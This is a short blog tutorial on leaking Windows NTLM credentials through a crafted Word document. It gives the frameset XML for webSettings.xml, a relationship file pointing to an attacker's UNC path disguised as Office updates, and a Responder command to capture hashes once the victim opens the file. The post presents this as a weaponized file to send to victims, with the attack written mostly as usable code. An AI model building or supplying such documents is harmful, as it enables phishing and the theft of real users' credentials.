Leaking windows Credentials via Microsoft Office Document

akijos

This blog post is based on “Tradecraft Security Weekly Talk EP 21” given by @dafthack and @ustayready from Black Hills Information Security.

Microsoft word document “DOCX” file is an ZIP archive of XML files. These XML documents controls the Theme,Fonts and web settings of the document. Historically Word document used to be HTML editor. we will be adding framesets in Microsoft word documents and also set an UNC path to leak the windows credentials.

we will start with creating an empty word document file (just by giving space and then saving the file) and opening it using 7 zip archive. In the archive we will go inside ‘word‘ folder and the file of our interest is ‘webSettings.xml‘ file, we will copy this file locally and add the framesets as per the snippet below:

<w:frameset>
<w:framesetSplitbar>
<w:w w:val="60"/>
<w:color w:val="auto"/>
<w:noBorder/>
</w:framesetSplitbar>
<w:frameset>
<w:frame>
<w:name w:val="3"/>
<w:sourceFileName r:id="rId1"/>
<w:linkedToFile/>
</w:frame>
</w:frameset>
</w:frameset>

This will create an  link to a file inside the ‘rels‘ folder. Now go inside the ‘rels‘ folder copy the available file locally and add the relationship. we will rename the file to ‘webSettings.xml.rels‘ and add the file back to the archive. Snippet for relationship is added below:

 
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships
xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\10.10.10.3\Microsoft_Office_Updates for windows 7/8/10" TargetMode="External"/>
</Relationships>

The ‘webSettings.xml.rels‘ file  would have Relationship id value i.e., rId1, UNC path and  Target Mode if its external or internal.

we are now ready to send the weaponized word document file to the victim.

On the other hand we will start the responder on Kali machine to listen for NTLM Hashes

 
Responder -I eth0 -e 10.10.10.3 -b -A -v

The moment victim opens the word document, the document will connect to the UNC path given in the relationship file( screenshot given below)

Connection_UNC

I have also created a video which shows Windows Credential leakage

 

 

 

2 thoughts on “Leaking windows Credentials via Microsoft Office Document

Leave a comment